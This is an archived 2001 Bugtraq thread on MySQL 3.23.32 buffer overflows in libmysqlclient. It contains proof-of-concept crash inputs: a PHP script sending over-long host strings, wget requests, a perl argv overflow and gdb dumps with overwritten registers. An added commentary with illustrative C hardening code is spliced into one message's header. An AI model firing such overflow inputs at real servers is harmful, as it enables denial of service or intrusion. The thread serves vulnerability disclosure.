6084815 2001-02-11 00:40 +0100  /32 lines/ Konrad Rieck <kr@R0Q.CX>
Sent by: joel@lysator.liu.se
Imported: 2001-02-12  21:06  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: kr@R0Q.CX
Recipient: Bugtraq (import) <15365>
Comment on text 6077459 by Joao Gouveia <tharbad@KAOTIK.ORG>
Subject: Re: Some more MySql security issues
------------------------------------------------------------
From: Konrad Rieck <kr@R0Q.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010211004048.A9515@inf.fu-berlin.de>

I am a little bit confused about this mail. Maybe the author
can explain some issues to me...

On Sat, Feb 10, 2001 at 12:54:33AM -0000, Joao Gouveia wrote:
> roberto@spike:~ > mysql -ublaah (Note: 'blaah' obviously isn't a valid
> username)

You seem to have a strange configuration of mysql. By default only
valid users are allowed to connect to the database. So the overflow
in "drop database" can only be used by users of mysql. Well anyway, a
security problem that can lead to the privileges the mysqld is
running under, but not as simple as you show above.

> /home/jroberto/httpd/mysql/bin/mysql -h`perl -e'printf("A"x200)'`

This is a nice example of bad code, but not a security issue; I could
show you a hundred programs that simply don't care for *argv
parameters.  You don't gain anything by exploiting such overflows in
non-suid programs.

Regards,
Konrad

-- Konrad Rieck <kr@r0q.cx> Roqefellaz - http://www.r0q.cx, GPG
Public Key http://www.r0q.cx/keys/kr.pub
--           Fingerprint: 3AA8 CF92 C179 9760 C3B3  1B43 33B6 9221 AFBF 5897
(6084815) --------------------------------(Reflowed)
6086241 2001-02-12 22:19 +0100  /50 lines/ Konrad Rieck <kr@R0Q.CX>
Sent by: joel@lysator.liu.se
Imported: 2001-02-13  04:19  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: kr@R0Q.CX
Recipient: Bugtraq (import) <15394>
Comment on text 6086297 by Tim Yardley <yardley@UIUC.EDU>
    Sent:     2001-02-13 06:17
Subject: Re: Some more MySql security issues
------------------------------------------------------------
From: Konrad Rieck <kr@R0Q.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010212221920.A4665@inf.fu-berlin.de>

On Mon, Feb 12, 2001 at 02:34:43PM -0600, Tim Yardley wrote:
> >This is a nice example of bad code, but not a security issue, I could
> >show up a 100 of programs that simply don't care for *argv parameters.
> >You don't gain anything by exploiting such overflows in non-suid programs.
>
> watch what you say there.  there have been hundreds of programs that have
> been exploited via argv params.  a bof is a bof.. regardless of where it
> is.  also, just because you don't gain anything doesn't mean that the
> problem shouldn't be documented and fixed.

A bof is a bof. You are completely right, but as I said and I still
believe so, most buffer overflows are just bad coding practice. Don't
get confused by all that hype, there are far more applications with
buffer overflows in argv that are definitely not security relevant
than security relevant ones.

> lastly, you stated that nothing
> is gained by overflowing non-suid programs.  that statement is obviously
> inaccurate.  if you gain ANY uid/gid (etc etc) that is not in your
> current list, you are changing your privileges on the system.  whether or
> not it is a ROOT compromise is a whole different matter.

Maybe I was expressing myself a little bit too sloppily, but if I consider
applications that are non-suid (so no set-uid occurs), e.g. the mysql
command, there is nothing special about overflows in the
*argv parameters; it's just bad code. This is special to those command
line parameters, since they are only given by the user who is executing
the program.

I am not talking about general problems with buffer overflow or any
other technique that might allow overwriting the stack, but in this
case the user who is sending the content to the stack, is the one
that can execute it - privileges are not changed.

Maybe you can explain how I would change my privileges on a system
when executing exactly such overflows; I can't see it.

Regards,
Konrad

-- Konrad Rieck <kr@r0q.cx> Roqefellaz - http://www.r0q.cx, GPG
Public Key http://www.r0q.cx/keys/kr.pub
--           Fingerprint: 3AA8 CF92 C179 9760 C3B3  1B43 33B6 9221 AFBF 5897
(6086241) --------------------------------(Reflowed)
6091561 2001-02-12 17:20 -0300  /151 lines/ Hector A.Paterno <apmailing@FIBERTEL.COM.AR>
Sent by: joel@lysator.liu.se
Imported: 2001-02-13  22:41  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: apmailing@FIBERTEL.COM.AR
Recipient: Bugtraq (import) <15413>
Subject: Re: Some more MySql security issues
------------------------------------------------------------
From: "Hector A.Paterno" <apmailing@FIBERTEL.COM.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01021217200000.01981@PlayBox>

On Monday 12 February 2001 18:22, you wrote:

> ----- Original Message -----
> From: "Joao Gouveia" <tharbad@KAOTIK.ORG>
> To: <BUGTRAQ@SECURITYFOCUS.COM>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding these issues on 2001-01-26.
> >
> > There still are some potential security flaws with MySql's latest stable
> > release.
> > Here follow some tests I've made, all with:
> >
> > MySql v3.23.32
> > PHP v4.0.4pl1 (static)
> > apache-1.3.14
> >
> > Let's look at a practical example:
> > A simple php script:
> > <?
> > for ( $i=0 ; $i<= $buffer-1 ; ++$i )
> > $host.="A";
> >
> > $cid = mysql_connect($host,$usr,$pwd);
> > ?>
> > Let's run apache ( latest version compiled with latest version of PHP )
> > in debugging mode to see what happens:
> > <quote>
> > spike:~ # gdb /www/bin/httpd
> > ...
> > (gdb) run -X
> > Starting program: /www/bin/httpd -X
> > </quote>
> > On our browser we issue: test.php?buffer=120
> > gdb shows the following
> > <quote>
> > Program received signal SIGSEGV, Segmentation fault.
> > 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > (gdb) bt
> > #0  0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > #1  0x41414141 in ?? ()
> > (gdb) inf reg
> > eax            0x82010c0        136319168
> > ecx            0x3      3
> > edx            0x82010f4        136319220
> > ebx            0x40046324       1074029348
> > esp            0xbfffdc30       0xbfffdc30
> > ebp            0xbfffdfbc       0xbfffdfbc
> > esi            0x8204ba5        136334245
> > edi            0x41414141       1094795585
> > eip            0x40030cf3       0x40030cf3
> > eflags         0x10203  66051
> > cs             0x23     35
> > ss             0x2b     43
> > ds             0x2b     43
> > es             0x2b     43
> > fs             0x0      0
> > gs             0x0      0
> > (gdb)
> > </quote>

Let's try this problem:

Scenario:

Debian Woody.
mysql Ver 11.11 Distrib Mysql 3.23.31
Apache 1.3.14
php 4.0.4pl1

StuffBox:/usr/sbin# gdb apache
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you a
welcome to change it and/or distribute copies of it under certain conditio
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)...
(gdb) run -X
Starting program: /usr/sbin/apache -X
[..]

On the other machine I write this script:
<?
// $buffer (and $usr, $pwd) arrive from the request via register_globals
for ( $i=0 ; $i<= $buffer-1 ; ++$i )
    $host.="A";
$cid = mysql_connect($host,$usr,$pwd);
?>
and uploaded it to my public_html on StuffBox ( the box that is running apache +
mysql + php ).

Then I tested some buffer lengths from another site:

200:

PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200

StuffBox :
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160       1075552608
ecx            0x0      0
edx            0x2      2
ebx            0x401b9474       1075549300
esp            0xbfffe27c       0xbfffe27c
ebp            0xbfffe2b4       0xbfffe2b4
esi            0x61697620       1634301472
edi            0x6      6
eip            0x40182e9d       0x40182e9d


500 :
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160       1075552608
ecx            0x0      0
edx            0x2      2
ebx            0x401b9474       1075549300
esp            0xbfffe27c       0xbfffe27c
ebp            0xbfffe2b4       0xbfffe2b4
esi            0x41414141       1094795585    <<=
edi            0x6      6
eip            0x40182e9d       0x40182e9d


Cya.
(6091561) --------------------------------(Reflowed)
6091773 2001-02-13 03:55 +0000  /25 lines/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-02-13  23:11  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: tharbad@kaotik.org
Recipient: Bugtraq (import) <15417>
Comment on text 6086241 by Konrad Rieck <kr@R0Q.CX>
Subject: Re: Some more MySql security issues
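As an added illustration (not code from any poster in this thread, nor from MySQL or PHP), here is the copy pattern that produces a crash like the one reproduced above, beside a bounded version that rejects an over-long host before it reaches a fixed-size buffer or an address parser such as inet_aton(). The 128-byte buffer, the try_connect/a_host names and the status enum are assumptions made for the example; the thread does not show libmysqlclient's internals.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size hostname buffer. The thread only shows that a
 * 200-byte host crashes mysql_real_connect(); the real size and layout in
 * libmysqlclient 3.23.32 are not on the page, so 128 is an assumption. */
#define HOST_BUF_LEN 128

/* Reason a connection attempt was refused (HOST_OK means it may proceed). */
enum host_status { HOST_OK = 0, HOST_EMPTY, HOST_TOO_LONG };

/* The pattern the crash exhibits: a caller-influenced string copied into a
 * fixed buffer with no length check. Kept only for contrast; it is never
 * called here with an input longer than the buffer, since that is undefined
 * behaviour rather than a demonstration. */
static void copy_host_unchecked(char *dst, const char *host)
{
    strcpy(dst, host);
}

/* Length of host, counting at most `cap` bytes (bounded strlen without
 * relying on the POSIX strnlen declaration). */
static size_t bounded_len(const char *host, size_t cap)
{
    size_t n = 0;
    while (n < cap && host[n] != '\0')
        n++;
    return n;
}

/* Hardened copy: refuse anything that does not fit together with its NUL.
 * Rejecting is preferred over truncating, because a silently shortened
 * hostname would connect to a host the caller never asked for. */
static enum host_status copy_host_checked(char *dst, size_t dst_len, const char *host)
{
    size_t n = bounded_len(host, dst_len);
    if (n == 0)
        return HOST_EMPTY;
    if (n >= dst_len)          /* no room for the terminator */
        return HOST_TOO_LONG;
    memcpy(dst, host, n + 1);
    return HOST_OK;
}

/* Stand-in for the connect path: validate the host before any fixed-size
 * buffer or parser sees it. */
enum host_status try_connect(const char *host)
{
    char buf[HOST_BUF_LEN];
    enum host_status st = copy_host_checked(buf, sizeof buf, host);
    if (st != HOST_OK)
        return st;
    /* a real client would resolve `buf` and open the socket here */
    return HOST_OK;
}

/* Builds the thread's test input: n repeated 'A' bytes (constructed sample,
 * capped at 1023 so the static buffer cannot itself overflow). */
const char *a_host(size_t n)
{
    static char s[1024];
    if (n >= sizeof s)
        n = sizeof s - 1;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char ok_buf[HOST_BUF_LEN];
    copy_host_unchecked(ok_buf, "localhost");   /* safe only because the input is short */
    printf("localhost -> %d\n", try_connect("localhost"));
    printf("A x 200   -> %d\n", try_connect(a_host(200)));
    printf("A x 500   -> %d\n", try_connect(a_host(500)));
    return 0;
}
```

The same length check belongs at the PHP layer in a shared-hosting setup like the one discussed in this thread, applied to user input before it is passed to mysql_connect(); the library-side check is what a release such as 3.23.33 would have to supply for callers that do not validate.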
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <007101c09570$c8ee2560$0400a8c0@corbusier.org>

----- Original Message -----
From: "Konrad Rieck" <kr@R0Q.CX>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, February 12, 2001 9:19 PM
Subject: Re: Some more MySql security issues


> Maybe you can explain, how I will change my privileges on a system, when
> executing exactly such overflows, I can't see it.

Maybe in a situation where executing arbitrary code isn't one of your
privileges. Like, for example, a web hosting service that offers
mysql+php (safe_mode) and no shell access.

Best regards,

Joao Gouveia
--------------
tharbad@kaotik.org
(6091773) --------------------------------(Reflowed)
6092187 2001-02-13 12:49 -0600  /68 lines/ Tim Yardley <yardley@UIUC.EDU>
Sent by: joel@lysator.liu.se
Imported: 2001-02-14  00:39  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: yardley@UIUC.EDU
Recipient: Bugtraq (import) <15425>
Comment on text 6086241 by Konrad Rieck <kr@R0Q.CX>
Subject: Re: Some more MySql security issues
------------------------------------------------------------
From: Tim Yardley <yardley@UIUC.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <5.0.2.1.2.20010213123822.085be5f8@students.uiuc.edu>

At 03:19 PM 2/12/2001, Konrad Rieck wrote:
>A bof is a bof. You are completely right, but as I said and I still believe
>so, most buffer overflows are just bad coding practice. Don't get confused
>by all that hype, there are far more applications with buffer overflows
>in argv that are definitely not security relevant than security relevant
>ones.

Yes, I agree that they are typically bad coding practice... or at
least oversights.  As for security relevance, that is all a matter of
context...  but I will leave that cat in the box.

> > lastly, you stated that nothing
> > is gained by overflowing non-suid programs.  that statement is obviously
> > inaccurate.  if you gain ANY uid/gid (etc etc) that is not in your
> > current list, you are changing your privileges on the system.  whether or
> > not it is a ROOT compromise is a whole different matter.
>
>Maybe I was expressing myself a little bit too sloppily, but if I consider
>applications that are non-suid (so no set-uid occurs), e.g. the mysql

There are still the cases of capabilities, privileges, etc etc.
These pertain more to TOS's than others, however the TOS movement has
expanded into the standard free unix environment, albeit in limited
form.  The point to make here is that setuid/setgid bits are not the
only things that could cause you to gain something you didn't have
before.

A simple theoretical example: say you grant a privilege to a binary
such that it can open a port < 1024, and you do so to eliminate the
need to make the process setuid.  Now, someone overflows a command
line argument in that application such that they successfully gain the
privilege of binding to a low port that the application had
previously.  Note that I say successfully due to the fact that a lot
of TOS implementations drop privs on exec, so one would have to be
more crafty than that (raw shell image replacement and execution
based on manipulated eip).

Another possibility is a case in which the offensive program is
wrapped or used by another that *IS* privileged.  Or simply a case in
which there is an overflow in a library (which was one of the cases
here).  All of these are bad in varying degrees.

>Maybe you can explain how I would change my privileges on a system
>when executing exactly such overflows; I can't see it.

see above.

alas though, this is all a moot point.  all that needs to be said is
that by convention on bugtraq, people associate setuid with setuid(0)
and any other case is referred to as setuid man or setgid man, etc
etc.  I was just clarifying the fact that you must be careful when
saying setuid in a forum that typically associates that with root
privs.

/tmy

-- Diving into infinity my consciousness expands in inverse
    proportion to my distance from singularity

+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- ---------------+
| Tim Yardley (yardley@uiuc.edu)
| http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- ---------------+
(6092187) --------------------------------(Reflowed)

6092295 2001-02-13 11:40 +0000  /21 lines/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-02-14  01:53  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: tharbad@kaotik.org
Recipient: Bugtraq (import) <15431>
Subject: MySql new version
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200102131140.LAA29405@srvlis11.teleweb.pt>

Hi,

MySql version 3.23.33 has been released, addressing these latest problems.
Change log at http://www.mysql.com/doc/N/e/News-3.23.33.html
<quote>
Fixed buffer overrun in libmysqlclient library. Fixed bug in handling STOP
event after ROTATE event in replication.
Fixed another buffer overrun in DROP DATABASE.
</quote>

Regards,

Joao Gouveia
------------
tharbad@kaotik.org
(6092295) ------------------------------------------